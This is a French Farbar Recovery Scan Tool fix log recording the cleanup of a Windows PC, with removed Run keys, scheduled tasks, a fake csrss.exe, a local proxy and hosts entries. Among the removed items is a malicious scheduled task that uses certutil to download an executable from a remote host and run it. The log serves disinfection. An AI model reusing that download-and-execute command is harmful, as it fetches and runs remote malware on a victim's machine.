Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 13-02-2021
Exécuté par quent (14-02-2021 10:04:28) Run:1
Exécuté depuis C:\Users\quent\Desktop
Profils chargés: quent
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
Hosts:
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=COS2&ptag=D020421-A5AF4E3D53C&form=CONMHP&conlogo=CT3335878
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxps://www.msn.com/fr-fr/?pc=UE01&ocid=UE01DHP
SearchScopes: HKU\S-1-5-21-1693594128-1492437577-1554772416-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COS2&ptag=D020421-N0700A5AF4E3D53C&form=CONBDF&conlogo=CT3335878&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1693594128-1492437577-1554772416-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COS2&ptag=D020421-N0700A5AF4E3D53C&form=CONBDF&conlogo=CT3335878&q={searchTerms}
IE trusted site: HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\webcompanion.com -> hxxp://webcompanion.com
35.156.90.191 authserver.mojang.com
35.156.90.191 sessionserver.mojang.com
HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "Free Download Manager"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "GogGalaxy"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "Web Companion"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "PatientSnowflake"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\StartupApproved\Run: => "DLByb"
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\Run: [uTorrent] => C:\Users\quent\AppData\Roaming\uTorrent\uTorrent.exe [2146776 2021-02-04] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\Run: [DLByb] => C:\Users\quent\AppData\Roaming\DLByb\elbybb.dll [22016 2021-02-04] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\...\Run: [PatientSnowflake] => C:\WINDOWS\rss\csrss.exe [4020224 2021-02-04] () [Fichier non signé] <==== ATTENTION
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\88.0.4324.150\Installer\chrmstp.exe [2021-02-05] (Google LLC -> Google LLC)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {04ceb5d0-e74a-43cf-aae4-0bc0f7ceabda} - pas de chemin du fichier
Task: {7B45121C-8FD3-44E1-B7E9-89629DA1CE77} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4020224 2021-02-04] () [Fichier non signé] <==== ATTENTION
Task: {CF824D45-48FB-4DB9-B2E0-53D89B84E5A8} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\SysInfo => C:\Users\quent\AppData\Roaming\\toolsyshost\\sihost.exe [74240 2021-01-31] () [Fichier non signé] <==== ATTENTION
Task: {E356D46A-295F-42C5-8E37-EEAEF31546C9} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\quent\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\quent\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://fotamene.com/app/app.exe C:\Users\quent\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\quent\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
ProxyServer: [S-1-5-21-1693594128-1492437577-1554772416-1001] => 127.0.0.1:8003
"BridleBuddlesService" => service a été déverrouillé. <==== ATTENTION
R2 BridleBuddlesService; C:\Program Files (x86)\BridleBuddles\BridleBuddlesService.exe [8021992 2021-01-29] (KAY ENTERPRICES LIMITED -> BigStartrail Geeks)
C:\Program Files (x86)\BridleBuddles
2021-02-13 22:58 - 2021-02-13 22:58 - 000000756 _____ C:\Users\quent\Desktop\ZHPFix.txt
2021-02-13 22:27 - 2021-02-13 22:27 - 000383459 _____ C:\Users\quent\Desktop\ZHPDiag.html
2021-02-13 22:27 - 2021-02-13 22:27 - 000310188 _____ C:\Users\quent\Desktop\ZHPDiag.txt
2021-02-13 21:44 - 2021-02-13 22:58 - 000000000 ____D C:\Users\quent\AppData\Roaming\ZHP
2021-02-13 21:44 - 2021-02-13 22:21 - 000000872 _____ C:\Users\quent\Desktop\ZHPSuite.lnk
2021-02-13 21:44 - 2021-02-13 21:44 - 000000000 ____D C:\Users\quent\AppData\Local\ZHP
2021-02-13 21:39 - 2021-02-13 21:40 - 003481224 _____ (Nicolas Coolman) C:\Users\quent\Downloads\ZHPSuite.exe
2021-02-13 21:29 - 2021-02-13 21:29 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2021-01-30 12:00 - 2021-01-30 12:00 - 000008301 _____ C:\Users\quent\Downloads\Vengeio HACKS 1027 UNLIMTIED AMMO INF JUMP AUTO KILL TELEPORT AIMBOT ESP TIMESCALE.user.js
2021-01-29 22:46 - 2021-01-29 23:40 - 000000000 ____D C:\ProgramData\Avast Software
2021-01-25 18:36 - 2021-01-25 18:37 - 020606016 _____ (Outbyte) C:\Users\quent\Downloads\pc-repair-setup.exe
2021-01-25 18:38 - 2021-01-25 18:38 - 000001220 _____ C:\Users\quent\Desktop\PC Repair.lnk
EmptyTemp:
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh winsock reset

*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => supprimé(es) avec succès
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => supprimé(es) avec succès
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Internet Explorer\Main\\"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157" => valeur restauré(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => supprimé(es) avec succès
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => supprimé(es) avec succès
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost => supprimé(es) avec succès
HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com => supprimé(es) avec succès
35.156.90.191 authserver.mojang.com => Erreur: Pas de correction automatique trouvée pour cet élément.
35.156.90.191 sessionserver.mojang.com => Erreur: Pas de correction automatique trouvée pour cet élément.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\SecurityHealth" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\SecurityHealth" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32\\SunJavaUpdateSched" => supprimé(es) avec succès
"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\EpicGamesLauncher" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\EpicGamesLauncher" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\OneDrive" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\OneDrive" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Steam" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Steam" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Discord" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Discord" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\uTorrent" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\uTorrent" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Free Download Manager" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Free Download Manager" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\GogGalaxy" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\GogGalaxy" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Web Companion" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => non trouvé(e)
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\PatientSnowflake" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\PatientSnowflake" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\DLByb" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\DLByb" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Windows\CurrentVersion\Run\\uTorrent" => non trouvé(e)
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Windows\CurrentVersion\Run\\DLByb" => non trouvé(e)
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSnowflake" => non trouvé(e)
HKLM\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => supprimé(es) avec succès
HKLM\SOFTWARE\Policies\Mozilla => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04ceb5d0-e74a-43cf-aae4-0bc0f7ceabda}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7B45121C-8FD3-44E1-B7E9-89629DA1CE77}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7B45121C-8FD3-44E1-B7E9-89629DA1CE77}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CF824D45-48FB-4DB9-B2E0-53D89B84E5A8}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CF824D45-48FB-4DB9-B2E0-53D89B84E5A8}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Windows Error Reporting\SysInfo => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Error Reporting\SysInfo" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E356D46A-295F-42C5-8E37-EEAEF31546C9}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E356D46A-295F-42C5-8E37-EEAEF31546C9}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKU\S-1-5-21-1693594128-1492437577-1554772416-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer" => supprimé(es) avec succès
"BridleBuddlesService" => service a été déverrouillé. <==== ATTENTION => Erreur: Pas de correction automatique trouvée pour cet élément.
BridleBuddlesService => Impossible d'arrêter le service.
"HKLM\System\CurrentControlSet\Services\BridleBuddlesService" => supprimé(es) avec succès
BridleBuddlesService => service supprimé(es) avec succès

"C:\Program Files (x86)\BridleBuddles" dossier déplacer:

Impossible de déplacer "C:\Program Files (x86)\BridleBuddles" => Planifié pour déplacement au redémarrage.

C:\Users\quent\Desktop\ZHPFix.txt => déplacé(es) avec succès
C:\Users\quent\Desktop\ZHPDiag.html => déplacé(es) avec succès
C:\Users\quent\Desktop\ZHPDiag.txt => déplacé(es) avec succès
C:\Users\quent\AppData\Roaming\ZHP => déplacé(es) avec succès
C:\Users\quent\Desktop\ZHPSuite.lnk => déplacé(es) avec succès
C:\Users\quent\AppData\Local\ZHP => déplacé(es) avec succès
C:\Users\quent\Downloads\ZHPSuite.exe => déplacé(es) avec succès
C:\WINDOWS\LastGood.Tmp => déplacé(es) avec succès
C:\Users\quent\Downloads\Vengeio HACKS 1027 UNLIMTIED AMMO INF JUMP AUTO KILL TELEPORT AIMBOT ESP TIMESCALE.user.js => déplacé(es) avec succès
C:\ProgramData\Avast Software => déplacé(es) avec succès
C:\Users\quent\Downloads\pc-repair-setup.exe => déplacé(es) avec succès
C:\Users\quent\Desktop\PC Repair.lnk => déplacé(es) avec succès

========= ipconfig /flushdns =========


Configuration IP de Windows

Cache de r‚solution DNS vid‚.

========= Fin de CMD: =========


========= netsh advfirewall reset =========

Ok.


========= Fin de CMD: =========


========= netsh winsock reset =========


Le catalogue Winsock a ‚t‚ r‚initialis‚ correctement.
Vous devez red‚marrer l'ordinateur afin de finaliser la r‚initialisation.


========= Fin de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 10248192 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 22221742 B
Java, Flash, Steam htmlcache => 67360102 B
Windows/system/drivers => 109964 B
Edge => 0 B
Chrome => 8541138 B
Firefox => 0 B
Opera => 12322233 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 6103020 B
quent => 49074677 B

RecycleBin => 0 B
EmptyTemp: => 167.8 MB données temporaires supprimées.

================================

Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 14-02-2021 10:15:13)

C:\Program Files (x86)\BridleBuddles => a été déplacé(e) avec succès

==== Fin de Fixlog 10:15:13 ====